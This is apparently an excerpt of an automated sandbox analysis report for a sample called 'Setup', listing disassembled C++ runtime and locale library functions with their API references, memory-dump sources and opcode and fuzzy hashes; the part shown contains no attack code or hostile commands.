                                                                                                                                                                                                                                                      • Opcode ID: c887c67a4c1c0311cd8f6bfe161ba9f86e227e6528e66d5226c937a11ce952c4
                                                                                                                                                                                                                                                      • Instruction ID: c7f8d4d0bda86384844c89b7b13382ca144ed557201f1d5e1ef472bd3ac4ae42
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c887c67a4c1c0311cd8f6bfe161ba9f86e227e6528e66d5226c937a11ce952c4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E10100319001298FCF04EBA4C9086BEB7A7EF84310F25011AE805673A0CF749E01CFA9
                                                                                                                                                                                                                                                      Function 02D6CDEF Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D6CDF6
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D6CE00
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 02D6CE51
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D6CE71
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D6CE7E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 55977855-0
                                                                                                                                                                                                                                                      • Opcode ID: 74fc1503e775dff1ef516f62a953a82b3665f556a2321cbf79723ae5258649c8
                                                                                                                                                                                                                                                      • Instruction ID: da1b2245777a356d2dd2061ad3148ce7db5221fb767e0e0cc53f26d99f1d31d9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74fc1503e775dff1ef516f62a953a82b3665f556a2321cbf79723ae5258649c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C01AD319101298FCF05EBA8C9586BEB7B6EF84714F24451AE814A7390CF759E05CFA5
                                                                                                                                                                                                                                                      Function 02D60EAC Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60EB3
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60EBD
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 02D60EF7
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60F2E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 50917705-0
                                                                                                                                                                                                                                                      • Opcode ID: 41e985dcc352a12e6511f4bf4fc4dc1ee543562b93d77d22cff0399aa39eb6fc
                                                                                                                                                                                                                                                      • Instruction ID: f3c9b67e2a715da89ce8256cfceaa20b59e58245af30cf1413d49bd76acc6af6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41e985dcc352a12e6511f4bf4fc4dc1ee543562b93d77d22cff0399aa39eb6fc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 85F0F03191052A9BCF08FBA0C8147FE6626EF40315F604519E9146B3C0DF359E05CFE4
                                                                                                                                                                                                                                                      Function 02D60E17 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60E1E
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60E28
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • messages.LIBCPMT ref: 02D60E62
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60E99
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 50917705-0
                                                                                                                                                                                                                                                      • Opcode ID: 40b3ce45862ae2d8e7a1c889a66e0f19b4db7ba76e28539dead66d5074972f5c
                                                                                                                                                                                                                                                      • Instruction ID: 7d02de0684ff3915ddda6664b881affc8b8065aba7f20de831fe849320ccb656
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40b3ce45862ae2d8e7a1c889a66e0f19b4db7ba76e28539dead66d5074972f5c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0F0319101259BCF05EBA4C9547FE6326EF50315F600519EA146B3D0DF358E0A8BB5
                                                                                                                                                                                                                                                      Function 02D60D82 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D60D89
                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02D60D93
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::_Lockit.LIBCPMT ref: 02D29449
                                                                                                                                                                                                                                                        • Part of subcall function 02D29414: std::_Lockit::~_Lockit.LIBCPMT ref: 02D29473
                                                                                                                                                                                                                                                      • ctype.LIBCPMT ref: 02D60DCD
                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02D60E04
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3ctype
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3358926169-0
                                                                                                                                                                                                                                                      • Opcode ID: e4de731c418cf808acd8fc452002c8b80df09fbc584e5a272b0d8d4f801ea17c
                                                                                                                                                                                                                                                      • Instruction ID: 925416e664ab37a31b09bb46f6924a2451f0ffab9f104e0daa619a53c338aeb7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4de731c418cf808acd8fc452002c8b80df09fbc584e5a272b0d8d4f801ea17c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6F0FA318102298BCF04EBA0C8247FE6326EF4032AF644559E819AB3C0DF759E06CFA4
                                                                                                                                                                                                                                                      Function 02D7AB39 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 291COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __aulldiv
                                                                                                                                                                                                                                                      • String ID: +$-$@PI
                                                                                                                                                                                                                                                      • API String ID: 3732870572-533401412
                                                                                                                                                                                                                                                      • Opcode ID: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
                                                                                                                                                                                                                                                      • Instruction ID: 41ef7bcefa596eaa3ed41c8c2afdc4aaf4127ca9dc9349011ede6fd6b5a1faa6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d86644e1283cfaa69a9a237bde454d26c6d8be59227446baf86fc9dd63f69b2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EA1AF75A40258AFDF24CE68C8507EE7BB5EF46325F088559E8A5AB380F738DD42CB50
                                                                                                                                                                                                                                                      Function 02D3EB94 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D3ED5D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: '@PI$@PI$@PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-2151343152
                                                                                                                                                                                                                                                      • Opcode ID: 48c302ca692bac963d9076bbf8a13df93fd460f2e454e7a46bfd9545355c367e
                                                                                                                                                                                                                                                      • Instruction ID: 82aaf863c3c1a386486dc958cb5948f55b928b4ab3e09e0db2c77b2d9264e8ce
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48c302ca692bac963d9076bbf8a13df93fd460f2e454e7a46bfd9545355c367e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 395190B1A002059BCB29CF64E980A6EF7B5FF44304F14476ED8559B341E771EE94CBA1
                                                                                                                                                                                                                                                      Function 02D44B04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 02D44C2D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                                                                                      • String ID: @PI$@PI$@PI
                                                                                                                                                                                                                                                      • API String ID: 118556049-4240548292
                                                                                                                                                                                                                                                      • Opcode ID: 9cd45673e87d235d763ef49a99a4cd8a0bb5bbdcf434c4d09dc661dc1ef61c72
                                                                                                                                                                                                                                                      • Instruction ID: 1d0d4f53a705635ce0d6bd872c97d2207ad64b46dcc48c3e8cef36ef38be83c0
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cd45673e87d235d763ef49a99a4cd8a0bb5bbdcf434c4d09dc661dc1ef61c72
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C841F5B1A006049BD724DF68D880B6DF7E9EB45321F24476EE855CB380EB71DE80CBA1
                                                                                                                                                                                                                                                      Function 031C21BD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RtlEncodePointer.NTDLL(00000000), ref: 031C21E2
                                                                                                                                                                                                                                                      • CatchIt.LIBVCRUNTIME ref: 031C22C8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CatchEncodePointer
                                                                                                                                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                                                                                                                                      • API String ID: 1435073870-2084237596
                                                                                                                                                                                                                                                      • Opcode ID: c43c636e632fce9bcbb34e066b039a788a10dd09cf8d2fcd342512e68b72ecf5
                                                                                                                                                                                                                                                      • Instruction ID: a2795dc3899fd293ea82568c657b9d9901b1f118bafe31b6520850b7fe70c8d6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c43c636e632fce9bcbb34e066b039a788a10dd09cf8d2fcd342512e68b72ecf5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD41587590028DAFCF16DF98CC80AEEBBB6FF5C300F184499E9046A211D3359991DB51
                                                                                                                                                                                                                                                      Function 031B32DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 031B32E5
                                                                                                                                                                                                                                                        • Part of subcall function 031ACB11: _Maklocchr.LIBCPMT ref: 031ACB7D
                                                                                                                                                                                                                                                        • Part of subcall function 031ACB11: _Maklocchr.LIBCPMT ref: 031ACB90
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 031B337D
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 031B3397
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 2606921204-1686923651
                                                                                                                                                                                                                                                      • Opcode ID: 10d43fd7d0917fee3e37034bb1f5edf542c16af50d5679ed25002ce2f22e073d
                                                                                                                                                                                                                                                      • Instruction ID: e03d02edb0a1dcc28b5b304df110f52972eda01f0efed9f9d3205e2e3511a89d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10d43fd7d0917fee3e37034bb1f5edf542c16af50d5679ed25002ce2f22e073d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C521B4B5904B456FDB25DF74C8807AFBAF8BB0D740F08491AE069CBA41DB30E611CB90
                                                                                                                                                                                                                                                      Function 02D6E221 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mpunct$H_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 4281374311-1686923651
                                                                                                                                                                                                                                                      • Opcode ID: 9dbac6cf57a7859debba628e1a2665e756eb6bb81456cf880c9044b4d54274ca
                                                                                                                                                                                                                                                      • Instruction ID: bdca99ab2fe80fca39e36246a50d14f6673ee2f79c8d2a15822f2c776aacd740
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dbac6cf57a7859debba628e1a2665e756eb6bb81456cf880c9044b4d54274ca
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00218CB1904A516FDB25DF648844B7BBBE9AB09300F04895AA499C7B40D774EA01CFA0
                                                                                                                                                                                                                                                      Function 02D64AC2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 02D64AC9
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E2F5: _Maklocchr.LIBCPMT ref: 02D5E361
                                                                                                                                                                                                                                                        • Part of subcall function 02D5E2F5: _Maklocchr.LIBCPMT ref: 02D5E374
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 02D64B61
                                                                                                                                                                                                                                                      • _Mpunct.LIBCPMT ref: 02D64B7B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                      • String ID: $+xv
                                                                                                                                                                                                                                                      • API String ID: 2606921204-1686923651
                                                                                                                                                                                                                                                      • Opcode ID: e36d912d9294c4176ae1cc36afbe914f0d251cea8c1b0cdf24a6f49a31e69d2a
                                                                                                                                                                                                                                                      • Instruction ID: 323b5e12133ab7797da9bf9bc8caac5ebff30b8fe52f7801537ad31171c251ab
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e36d912d9294c4176ae1cc36afbe914f0d251cea8c1b0cdf24a6f49a31e69d2a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E218DB1804A52AFDB25DF64C85477BBBF9AB09300F044A5AE499C7B40D774EA01CFA0
                                                                                                                                                                                                                                                      Function 03178320 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 031783C9
                                                                                                                                                                                                                                                        • Part of subcall function 031BF9CE: KiUserExceptionDispatcher.NTDLL(E06D7363,00000001,00000003,031766AC,?,?,?,?,031766AC,?,0320384C), ref: 031BFA2E
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: DispatcherExceptionIos_base_dtorUserstd::ios_base::_
                                                                                                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                      • API String ID: 2705359024-1866435925
                                                                                                                                                                                                                                                      • Opcode ID: 83d84dcaedf18a9c5e19e62c182b1864657be1e6f2b1cba6bc06d07af01b6f50
                                                                                                                                                                                                                                                      • Instruction ID: 22f6e2ca056cd786f579f7a8be990b036755d67c084912763ed074d70e2e0ddd
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83d84dcaedf18a9c5e19e62c182b1864657be1e6f2b1cba6bc06d07af01b6f50
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF1108B69047086FD710DE5CDC06FAA73E8E70C620F18466AFD299B6C1E735D9048B91
                                                                                                                                                                                                                                                      Function 02D29B04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 02D29BAD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                                      • String ID: @vH$XvH$pvH
                                                                                                                                                                                                                                                      • API String ID: 323602529-2179960064
                                                                                                                                                                                                                                                      • Opcode ID: 2d6f2e9fcaddc223df7d48f976578ba98bb26607490a197f35c673da3c32ec7b
                                                                                                                                                                                                                                                      • Instruction ID: d95a9f8f0c42ac1be43de40cebea992f5a557047f14d74293e40ef54ed8ef909
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d6f2e9fcaddc223df7d48f976578ba98bb26607490a197f35c673da3c32ec7b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F1126B2C04658ABC710DE588851BE973D8EB14324F20866AED6897380F739ED04CBA5
                                                                                                                                                                                                                                                      Function 031D25C8 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetConsoleOutputCP.KERNEL32(03205040,00000000,00000000,?), ref: 031D262B
                                                                                                                                                                                                                                                        • Part of subcall function 031D92FE: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,031D81B3,?,00000000,-00000008), ref: 031D935F
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 031D287D
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 031D28C3
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 031D2966
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                                                                                                                                      • Opcode ID: 8b7bf02716b76b2b8f5ee9f4b05c3d0a1ca1b7eed2cfa217ad7998071f677dfd
                                                                                                                                                                                                                                                      • Instruction ID: d2da73deaabddfe9b950bd81e62a6fe94eebdb6c44c264fc3239f7036cc1f63e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b7bf02716b76b2b8f5ee9f4b05c3d0a1ca1b7eed2cfa217ad7998071f677dfd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D18975D002589FCB19CFA8D8809ADBBF5FF0E314F28456AE866EB351D730A942CB50
                                                                                                                                                                                                                                                      Function 0318C590 Relevance: 6.3, APIs: 4, Instructions: 298COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C75F
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C779
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C9A6
                                                                                                                                                                                                                                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 0318C9C0
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ___std_exception_destroy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4194217158-0
                                                                                                                                                                                                                                                      • Opcode ID: 8e2567a403a8d840238c8094867a2e779a258d2f29e3bec3debade0874508b92
                                                                                                                                                                                                                                                      • Instruction ID: 005621e895ff0e82167f585cf1a393c0bf6ba69a0b2b0bc7f7ed24309612f66e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e2567a403a8d840238c8094867a2e779a258d2f29e3bec3debade0874508b92
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1E12374D05399DFDB20EB64C954BDEFBB4AF1A300F1481D9D449A7281DB706A88CFA2
                                                                                                                                                                                                                                                      Function 031C1BC1 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2771638844.0000000003171000.00000020.10000000.00040000.00000000.sdmp, Offset: 03171000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3171000_Setup.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                                                                                                                                      • Opcode ID: 4ce7d3f0401d45ff5f902b9de1e4a6f3ff521a0a50b5b674f6fe822c8fa6c95d
                                                                                                                                                                                                                                                      • Instruction ID: 0c079e91f9418fba0fa2250a2339a85777944767eecc4ee0f3d8001f5aa7c925
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ce7d3f0401d45ff5f902b9de1e4a6f3ff521a0a50b5b674f6fe822c8fa6c95d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE51F3B6950786BFDB29DF54D845BBAB3A4EF2C200F18443DF8018A292D731DC81C794
                                                                                                                                                                                                                                                      Function 02D733A5 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2770976220.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2d20000_Setup.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
